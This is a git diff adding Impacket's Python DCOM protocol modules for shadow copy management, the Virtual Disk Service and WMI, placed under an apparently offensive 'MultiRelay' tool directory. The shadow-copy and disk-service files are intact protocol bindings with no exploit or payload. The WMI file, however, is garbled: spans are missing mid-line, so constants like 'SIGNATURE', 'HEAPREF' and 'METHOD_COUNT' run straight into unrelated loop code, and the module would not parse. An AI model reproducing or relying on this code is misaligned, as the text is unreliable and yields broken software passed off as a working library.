+ request['rgVarRefIdx'] = rgVarRefIdx
+ request['rgVarRef'] = rgVarRefIdx
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py
new file mode 100644
index 0000000..752235c
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py
@@ -0,0 +1,337 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-SCMP]: Shadow Copy Management Protocol Interface implementation
+# This was used as a way to test the DCOM runtime. Further
+# testing is needed to verify it is working as expected
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Since DCOM is like an OO RPC, instead of helper functions you will see the
+# classes described in the standards developed.
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRENUM, NDRSTRUCT, NDRUNION
+from impacket.dcerpc.v5.dcomrt import PMInterfacePointer, INTERFACE, DCOMCALL, DCOMANSWER, IRemUnknown2
+from impacket.dcerpc.v5.dtypes import LONG, LONGLONG, ULONG, WSTR
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ if self.error_code in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1]
+ return 'SCMP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'SCMP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_ShadowCopyProvider = string_to_bin('0b5a2c52-3eb9-470a-96e2-6c6d4570e40f')
+IID_IVssSnapshotMgmt = string_to_bin('FA7DF749-66E7-4986-A27F-E2F04AE53772')
+IID_IVssEnumObject = string_to_bin('AE1C7110-2F60-11d3-8A39-00C04F72D8E3')
+IID_IVssDifferentialSoftwareSnapshotMgmt = string_to_bin('214A0F28-B737-4026-B847-4F9E37D79529')
+IID_IVssEnumMgmtObject = string_to_bin('01954E6B-9254-4e6e-808C-C9E05D007696')
+IID_ShadowCopyProvider = string_to_bin('B5946137-7B9F-4925-AF80-51ABD60B20D5')
+
+# 2.2.1.1 VSS_ID
+class VSS_ID(NDRSTRUCT):
+ structure = (
+ ('Data','16s=b""'),
+ )
+
+ def getAlignment(self):
+ return 2
+
+#2.2.1.2 VSS_PWSZ
+VSS_PWSZ = WSTR
+
+# 2.2.1.3 VSS_TIMESTAMP
+VSS_TIMESTAMP = LONGLONG
+
+error_status_t = LONG
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1 VSS_OBJECT_TYPE Enumeration
+class VSS_OBJECT_TYPE(NDRENUM):
+ class enumItems(Enum):
+ VSS_OBJECT_UNKNOWN = 0
+ VSS_OBJECT_NONE = 1
+ VSS_OBJECT_SNAPSHOT_SET = 2
+ VSS_OBJECT_SNAPSHOT = 3
+ VSS_OBJECT_PROVIDER = 4
+ VSS_OBJECT_TYPE_COUNT = 5
+
+# 2.2.2.2 VSS_MGMT_OBJECT_TYPE Enumeration
+class VSS_MGMT_OBJECT_TYPE(NDRENUM):
+ class enumItems(Enum):
+ VSS_MGMT_OBJECT_UNKNOWN = 0
+ VSS_MGMT_OBJECT_VOLUME = 1
+ VSS_MGMT_OBJECT_DIFF_VOLUME = 2
+ VSS_MGMT_OBJECT_DIFF_AREA = 3
+
+# 2.2.2.3 VSS_VOLUME_SNAPSHOT_ATTRIBUTES Enumeration
+class VSS_VOLUME_SNAPSHOT_ATTRIBUTES(NDRENUM):
+ class enumItems(Enum):
+ VSS_VOLSNAP_ATTR_PERSISTENT = 0x01
+ VSS_VOLSNAP_ATTR_NO_AUTORECOVERY = 0x02
+ VSS_VOLSNAP_ATTR_CLIENT_ACCESSIBLE = 0x04
+ VSS_VOLSNAP_ATTR_NO_AUTO_RELEASE = 0x08
+ VSS_VOLSNAP_ATTR_NO_WRITERS = 0x10
+
+# 2.2.2.4 VSS_SNAPSHOT_STATE Enumeration
+class VSS_SNAPSHOT_STATE(NDRENUM):
+ class enumItems(Enum):
+ VSS_SS_UNKNOWN = 0x01
+ VSS_SS_CREATED = 0x0c
+
+# 2.2.2.5 VSS_PROVIDER_TYPE Enumeration
+class VSS_PROVIDER_TYPE(NDRENUM):
+ class enumItems(Enum):
+ VSS_PROV_UNKNOWN = 0
+
+# 2.2.3.7 VSS_VOLUME_PROP Structure
+class VSS_VOLUME_PROP(NDRSTRUCT):
+ structure = (
+ ('m_pwszVolumeName', VSS_PWSZ),
+ ('m_pwszVolumeDisplayName', VSS_PWSZ),
+ )
+
+# 2.2.3.5 VSS_MGMT_OBJECT_UNION Union
+class VSS_MGMT_OBJECT_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+ union = {
+ VSS_MGMT_OBJECT_TYPE.VSS_MGMT_OBJECT_VOLUME: ('Vol', VSS_VOLUME_PROP),
+ #VSS_MGMT_OBJECT_DIFF_VOLUME: ('DiffVol', VSS_DIFF_VOLUME_PROP),
+ #VSS_MGMT_OBJECT_DIFF_AREA: ('DiffArea', VSS_DIFF_AREA_PROP),
+ }
+
+# 2.2.3.6 VSS_MGMT_OBJECT_PROP Structure
+class VSS_MGMT_OBJECT_PROP(NDRSTRUCT):
+ structure = (
+ ('Type', VSS_MGMT_OBJECT_TYPE),
+ ('Obj', VSS_MGMT_OBJECT_UNION),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.3 IVssEnumMgmtObject Details
+
+# 3.1.3.1 Next (Opnum 3)
+class IVssEnumMgmtObject_Next(DCOMCALL):
+ opnum = 3
+ structure = (
+ ('celt', ULONG),
+ )
+
+class IVssEnumMgmtObject_NextResponse(DCOMANSWER):
+ structure = (
+ ('rgelt', VSS_MGMT_OBJECT_PROP),
+ ('pceltFetched', ULONG),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.2.1 Next (Opnum 3)
+class IVssEnumObject_Next(DCOMCALL):
+ opnum = 3
+ structure = (
+ ('celt', ULONG),
+ )
+
+class IVssEnumObject_NextResponse(DCOMANSWER):
+ structure = (
+ ('rgelt', VSS_MGMT_OBJECT_PROP),
+ ('pceltFetched', ULONG),
+ ('ErrorCode', error_status_t),
+ )
+
+class GetProviderMgmtInterface(DCOMCALL):
+ opnum = 3
+ structure = (
+ ('ProviderId', VSS_ID),
+ ('InterfaceId', VSS_ID),
+ )
+
+class GetProviderMgmtInterfaceResponse(DCOMANSWER):
+ structure = (
+ ('ppItf', PMInterfacePointer),
+ ('ErrorCode', error_status_t),
+ )
+
+class QueryVolumesSupportedForSnapshots(DCOMCALL):
+ opnum = 4
+ structure = (
+ ('ProviderId', VSS_ID),
+ ('IContext', LONG),
+ )
+
+class QueryVolumesSupportedForSnapshotsResponse(DCOMANSWER):
+ structure = (
+ ('ppEnum', PMInterfacePointer),
+ ('ErrorCode', error_status_t),
+ )
+
+class QuerySnapshotsByVolume(DCOMCALL):
+ opnum = 5
+ structure = (
+ ('pwszVolumeName', VSS_PWSZ),
+ ('ProviderId', VSS_ID),
+ )
+
+class QuerySnapshotsByVolumeResponse(DCOMANSWER):
+ structure = (
+ ('ppEnum', PMInterfacePointer),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.4.4.5 QueryDiffAreasForVolume (Opnum 6)
+class QueryDiffAreasForVolume(DCOMCALL):
+ opnum = 6
+ structure = (
+ ('pwszVolumeName', VSS_PWSZ),
+ )
+
+class QueryDiffAreasForVolumeResponse(DCOMANSWER):
+ structure = (
+ ('ppEnum', PMInterfacePointer),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.4.4.6 QueryDiffAreasOnVolume (Opnum 7)
+class QueryDiffAreasOnVolume(DCOMCALL):
+ opnum = 7
+ structure = (
+ ('pwszVolumeName', VSS_PWSZ),
+ )
+
+class QueryDiffAreasOnVolumeResponse(DCOMANSWER):
+ structure = (
+ ('ppEnum', PMInterfacePointer),
+ ('ErrorCode', error_status_t),
+ )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IVssEnumMgmtObject(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self, interface)
+ self._iid = IID_IVssEnumMgmtObject
+
+ def Next(self, celt):
+ request = IVssEnumMgmtObject_Next()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['celt'] = celt
+ resp = self.request(request, self._iid, uuid = self.get_iPid())
+ return resp
+
+class IVssEnumObject(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self, interface)
+ self._iid = IID_IVssEnumObject
+
+ def Next(self, celt):
+ request = IVssEnumObject_Next()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['celt'] = celt
+ dce = self.connect()
+ resp = dce.request(request, self._iid, uuid = self.get_iPid())
+ return resp
+
+class IVssSnapshotMgmt(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self, interface)
+ self._iid = IID_IVssSnapshotMgmt
+
+ def GetProviderMgmtInterface(self, providerId = IID_ShadowCopyProvider, interfaceId = IID_IVssDifferentialSoftwareSnapshotMgmt):
+ req = GetProviderMgmtInterface()
+ classInstance = self.get_cinstance()
+ req['ORPCthis'] = classInstance.get_ORPCthis()
+ req['ORPCthis']['flags'] = 0
+ req['ProviderId'] = providerId
+ req['InterfaceId'] = interfaceId
+ resp = self.request(req, self._iid, uuid = self.get_iPid())
+ return IVssDifferentialSoftwareSnapshotMgmt(INTERFACE(classInstance, ''.join(resp['ppItf']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+ def QueryVolumesSupportedForSnapshots(self, providerId, iContext):
+ req = QueryVolumesSupportedForSnapshots()
+ classInstance = self.get_cinstance()
+ req['ORPCthis'] = classInstance.get_ORPCthis()
+ req['ORPCthis']['flags'] = 0
+ req['ProviderId'] = providerId
+ req['IContext'] = iContext
+ resp = self.request(req, self._iid, uuid = self.get_iPid())
+ return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),target = self.get_target()))
+
+ def QuerySnapshotsByVolume(self, volumeName, providerId = IID_ShadowCopyProvider):
+ req = QuerySnapshotsByVolume()
+ classInstance = self.get_cinstance()
+ req['ORPCthis'] = classInstance.get_ORPCthis()
+ req['ORPCthis']['flags'] = 0
+ req['pwszVolumeName'] = volumeName
+ req['ProviderId'] = providerId
+ try:
+ resp = self.request(req, self._iid, uuid = self.get_iPid())
+ except DCERPCException as e:
+ print(e)
+ from impacket.winregistry import hexdump
+ data = e.get_packet()
+ hexdump(data)
+ kk = QuerySnapshotsByVolumeResponse(data)
+ kk.dump()
+ #resp.dump()
+ return IVssEnumObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+class IVssDifferentialSoftwareSnapshotMgmt(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self, interface)
+ self._iid = IID_IVssDifferentialSoftwareSnapshotMgmt
+
+ def QueryDiffAreasOnVolume(self, pwszVolumeName):
+ req = QueryDiffAreasOnVolume()
+ classInstance = self.get_cinstance()
+ req['ORPCthis'] = classInstance.get_ORPCthis()
+ req['ORPCthis']['flags'] = 0
+ req['pwszVolumeName'] = pwszVolumeName
+ resp = self.request(req, self._iid, uuid = self.get_iPid())
+ return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+ def QueryDiffAreasForVolume(self, pwszVolumeName):
+ req = QueryDiffAreasForVolume()
+ classInstance = self.get_cinstance()
+ req['ORPCthis'] = classInstance.get_ORPCthis()
+ req['ORPCthis']['flags'] = 0
+ req['pwszVolumeName'] = pwszVolumeName
+ resp = self.request(req, self._iid, uuid = self.get_iPid())
+ return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py
new file mode 100644
index 0000000..0e46797
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py
@@ -0,0 +1,267 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-VDS]: Virtual Disk Service (VDS) Protocol
+# This was used as a way to test the DCOM runtime. Further
+# testing is needed to verify it is working as expected
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Since DCOM is like an OO RPC, instead of helper functions you will see the
+# classes described in the standards developed.
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM
+from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.enum import Enum
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ if self.error_code in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1]
+ return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')
+IID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')
+IID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')
+IID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')
+IID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')
+IID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')
+IID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')
+IID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')
+
+error_status_t = ULONG
+
+# 2.2.1.1.3 VDS_OBJECT_ID
+VDS_OBJECT_ID = GUID
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1.3.1 VDS_SERVICE_PROP
+class VDS_SERVICE_PROP(NDRSTRUCT):
+ structure = (
+ ('pwszVersion',LPWSTR),
+ ('ulFlags',ULONG),
+ )
+
+class OBJECT_ARRAY(NDRUniConformantVaryingArray):
+ item = PMInterfacePointer
+
+# 2.2.2.7.1.1 VDS_PROVIDER_TYPE
+class VDS_PROVIDER_TYPE(NDRENUM):
+ class enumItems(Enum):
+ VDS_PT_UNKNOWN = 0
+ VDS_PT_SOFTWARE = 1
+ VDS_PT_HARDWARE = 2
+ VDS_PT_VIRTUALDISK = 3
+ VDS_PT_MAX = 4
+
+# 2.2.2.7.2.1 VDS_PROVIDER_PROP
+class VDS_PROVIDER_PROP(NDRSTRUCT):
+ structure = (
+ ('id',VDS_OBJECT_ID),
+ ('pwszName',LPWSTR),
+ ('guidVersionId',GUID),
+ ('pwszVersion',LPWSTR),
+ ('type',VDS_PROVIDER_TYPE),
+ ('ulFlags',ULONG),
+ ('ulStripeSizeFlags',ULONG),
+ ('sRebuildPriority',SHORT),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)
+class IVdsServiceInitialization_Initialize(DCOMCALL):
+ opnum = 3
+ structure = (
+ ('pwszMachineName', LPWSTR),
+ )
+
+class IVdsServiceInitialization_InitializeResponse(DCOMANSWER):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)
+class IVdsService_IsServiceReady(DCOMCALL):
+ opnum = 3
+ structure = (
+ )
+
+class IVdsService_IsServiceReadyResponse(DCOMANSWER):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)
+class IVdsService_WaitForServiceReady(DCOMCALL):
+ opnum = 4
+ structure = (
+ )
+
+class IVdsService_WaitForServiceReadyResponse(DCOMANSWER):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)
+class IVdsService_GetProperties(DCOMCALL):
+ opnum = 5
+ structure = (
+ )
+
+class IVdsService_GetPropertiesResponse(DCOMANSWER):
+ structure = (
+ ('pServiceProp', VDS_SERVICE_PROP),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)
+class IVdsService_QueryProviders(DCOMCALL):
+ opnum = 6
+ structure = (
+ ('masks', DWORD),
+ )
+
+class IVdsService_QueryProvidersResponse(DCOMANSWER):
+ structure = (
+ ('ppEnum', PMInterfacePointer),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.1.1 IEnumVdsObject Interface
+# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)
+class IEnumVdsObject_Next(DCOMCALL):
+ opnum = 3
+ structure = (
+ ('celt', ULONG),
+ )
+
+class IEnumVdsObject_NextResponse(DCOMANSWER):
+ structure = (
+ ('ppObjectArray', OBJECT_ARRAY),
+ ('pcFetched', ULONG),
+ ('ErrorCode', error_status_t),
+ )
+# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)
+class IVdsProvider_GetProperties(DCOMCALL):
+ opnum = 3
+ structure = (
+ )
+
+class IVdsProvider_GetPropertiesResponse(DCOMANSWER):
+ structure = (
+ ('pProviderProp', VDS_PROVIDER_PROP),
+ ('ErrorCode', error_status_t),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IEnumVdsObject(IRemUnknown2):
+ def Next(self, celt=0xffff):
+ request = IEnumVdsObject_Next()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['celt'] = celt
+ try:
+ resp = self.request(request, uuid = self.get_iPid())
+ except Exception as e:
+ resp = e.get_packet()
+ # If it is S_FALSE(1) means less items were returned
+ if resp['ErrorCode'] != 1:
+ raise
+ interfaces = list()
+ for interface in resp['ppObjectArray']:
+ interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))
+ return interfaces
+
+class IVdsProvider(IRemUnknown2):
+ def GetProperties(self):
+ request = IVdsProvider_GetProperties()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ resp = self.request(request, uuid = self.get_iPid())
+ return resp
+
+class IVdsServiceInitialization(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self, interface)
+
+ def Initialize(self):
+ request = IVdsServiceInitialization_Initialize()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['pwszMachineName'] = '\x00'
+ resp = self.request(request, uuid = self.get_iPid())
+ return resp
+
+class IVdsService(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self, interface)
+
+ def IsServiceReady(self):
+ request = IVdsService_IsServiceReady()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ try:
+ resp = self.request(request, uuid = self.get_iPid())
+ except Exception as e:
+ resp = e.get_packet()
+ return resp
+
+ def WaitForServiceReady(self):
+ request = IVdsService_WaitForServiceReady()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ resp = self.request(request, uuid = self.get_iPid())
+ return resp
+
+ def GetProperties(self):
+ request = IVdsService_GetProperties()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ resp = self.request(request, uuid = self.get_iPid())
+ return resp
+
+ def QueryProviders(self, masks):
+ request = IVdsService_QueryProviders()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['masks'] = masks
+ resp = self.request(request, uuid = self.get_iPid())
+ return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py
new file mode 100644
index 0000000..c8affc3
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py
@@ -0,0 +1,3250 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-WMI]/[MS-WMIO] : Windows Management Instrumentation Remote Protocol. Partial implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Since DCOM is like an OO RPC, instead of helper functions you will see the
+# classes described in the standards developed.
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from struct import unpack, calcsize, pack
+from functools import partial
+import collections
+import logging
+
+from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantArray, NDRPOINTER, NDRUniConformantVaryingArray, NDRUNION, \
+ NDRENUM
+from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown, PMInterfacePointer, INTERFACE, \
+ PMInterfacePointer_ARRAY, BYTE_ARRAY, PPMInterfacePointer, OBJREF_CUSTOM
+from impacket.dcerpc.v5.dcom.oaut import BSTR
+from impacket.dcerpc.v5.dtypes import ULONG, DWORD, NULL, LPWSTR, LONG, HRESULT, PGUID, LPCSTR, GUID
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import hresult_errors, LOG
+from impacket.uuid import string_to_bin, uuidtup_to_bin
+from impacket.structure import Structure, hexdump
+
+
+def format_structure(d, level=0):
+ x = ""
+ if isinstance(d, collections.Mapping):
+ lenk = max([len(str(x)) for x in list(d.keys())])
+ for k, v in list(d.items()):
+ key_text = "\n" + " "*level + " "*(lenk - len(str(k))) + str(k)
+ x += key_text + ": " + format_structure(v, level=level+lenk)
+ elif isinstance(d, collections.Iterable) and not isinstance(d, str):
+ for e in d:
+ x += "\n" + " "*level + "- " + format_structure(e, level=level+4)
+ else:
+ x = str(d)
+ return x
+try:
+ from collections import OrderedDict
+except:
+ try:
+ from ordereddict.ordereddict import OrderedDict
+ except:
+ from ordereddict import OrderedDict
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ if self.error_code in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1]
+ return 'WMI SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ # Let's see if we have it as WBEMSTATUS
+ try:
+ return 'WMI Session Error: code: 0x%x - %s' % (self.error_code, WBEMSTATUS.enumItems(self.error_code).name)
+ except:
+ return 'WMI SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# WMIO Structures and Constants
+################################################################################
+WBEM_FLAVOR_FLAG_PROPAGATE_O_INSTANCE = 0x01
+WBEM_FLAVOR_FLAG_PROPAGATE_O_DERIVED_CLASS = 0x02
+WBEM_FLAVOR_NOT_OVERRIDABLE = 0x10
+WBEM_FLAVOR_ORIGIN_PROPAGATED = 0x20
+WBEM_FLAVOR_ORIGIN_SYSTEM = 0x40
+WBEM_FLAVOR_AMENDED = 0x80
+
+# 2.2.6 ObjectFlags
+OBJECT_FLAGS = 'B=0'
+
+#2.2.77 Signature
+SIGNATURE = ' 1:
+ if self['Encoded_String_Flag'] == 0:
+ self.structure += self.tascii
+ # Let's search for the end of the string
+ index = data[1:].find(b'\x00')
+ data = data[:index+1+1]
+ else:
+ self.structure = self.tunicode
+ self.isUnicode = True
+
+ self.fromString(data)
+ else:
+ self.structure = self.tascii
+ self.data = None
+
+ def __getitem__(self, key):
+ if key == 'Character' and self.isUnicode:
+ return self.fields['Character'].decode('utf-16le')
+ return Structure.__getitem__(self, key)
+
+
+# 2.2.8 DecServerName
+DEC_SERVER_NAME = ENCODED_STRING
+
+# 2.2.9 DecNamespaceName
+DEC_NAMESPACE_NAME = ENCODED_STRING
+
+# 2.2.7 Decoration
+class DECORATION(Structure):
+ structure = (
+ ('DecServerName', ':', DEC_SERVER_NAME),
+ ('DecNamespaceName', ':', DEC_NAMESPACE_NAME),
+ )
+
+# 2.2.69 HeapRef
+HEAPREF = ' 0:
+ itemn = QUALIFIER(data)
+ if itemn['QualifierName'] == 0xffffffff:
+ qName = b''
+ elif itemn['QualifierName'] & 0x80000000:
+ qName = DICTIONARY_REFERENCE[itemn['QualifierName'] & 0x7fffffff]
+ else:
+ qName = ENCODED_STRING(heap[itemn['QualifierName']:])['Character']
+
+ value = ENCODED_VALUE.getValue(itemn['QualifierType'], itemn['QualifierValue'], heap)
+ qualifiers[qName] = value
+ data = data[len(itemn):]
+
+ return qualifiers
+
+# 2.2.20 ClassQualifierSet
+CLASS_QUALIFIER_SET = QUALIFIER_SET
+
+# 2.2.22 PropertyCount
+PROPERTY_COUNT = ' 0:
+ record = QUALIFIER(qualifiersBuf)
+ if record['QualifierName'] & 0x80000000:
+ qualifierName = DICTIONARY_REFERENCE[record['QualifierName'] & 0x7fffffff]
+ else:
+ qualifierName = ENCODED_STRING(heap[record['QualifierName']:])['Character']
+ qualifierValue = ENCODED_VALUE.getValue(record['QualifierType'], record['QualifierValue'], heap)
+ qualifiersBuf = qualifiersBuf[len(record):]
+ qualifiers[qualifierName] = qualifierValue
+
+ propItemDict['qualifiers'] = qualifiers
+ properties[propName] = propItemDict
+
+ propTable = propTable[self.PropertyLookupSize:]
+
+ return OrderedDict(sorted(list(properties.items()), key=lambda x:x[1]['order']))
+ #return properties
+
+# 2.2.66 Heap
+HEAP_LENGTH = ' 0:
+ value = ENCODED_VALUE.getValue(properties[key]['type'], itemValue, heap)
+ properties[key]['value'] = "%s" % value
+ valueTable = valueTable[dataSize:]
+ return properties
+
+# 2.2.39 MethodCount
+METHOD_COUNT = ' 0:
+ methodDict['InParams'] = inputSignature['ObjectBlock']['ClassType']['CurrentClass'].getProperties()
+ methodDict['InParamsRaw'] = inputSignature['ObjectBlock']
+ #print methodDict['InParams']
+ else:
+ methodDict['InParams'] = None
+ if itemn['OutputSignature'] != 0xffffffff:
+ outputSignature = METHOD_SIGNATURE_BLOCK(heap[itemn['OutputSignature']:])
+ if outputSignature['EncodingLength'] > 0:
+ methodDict['OutParams'] = outputSignature['ObjectBlock']['ClassType']['CurrentClass'].getProperties()
+ methodDict['OutParamsRaw'] = outputSignature['ObjectBlock']
+ else:
+ methodDict['OutParams'] = None
+ data = data[len(itemn):]
+ methods[methodDict['name']] = methodDict
+
+ return methods
+
+# 2.2.14 ClassAndMethodsPart
+class CLASS_AND_METHODS_PART(Structure):
+ structure = (
+ ('ClassPart', ':', CLASS_PART),
+ ('MethodsPart', ':', METHODS_PART),
+ )
+
+ def getClassName(self):
+ pClassName = self['ClassPart']['ClassHeader']['ClassNameRef']
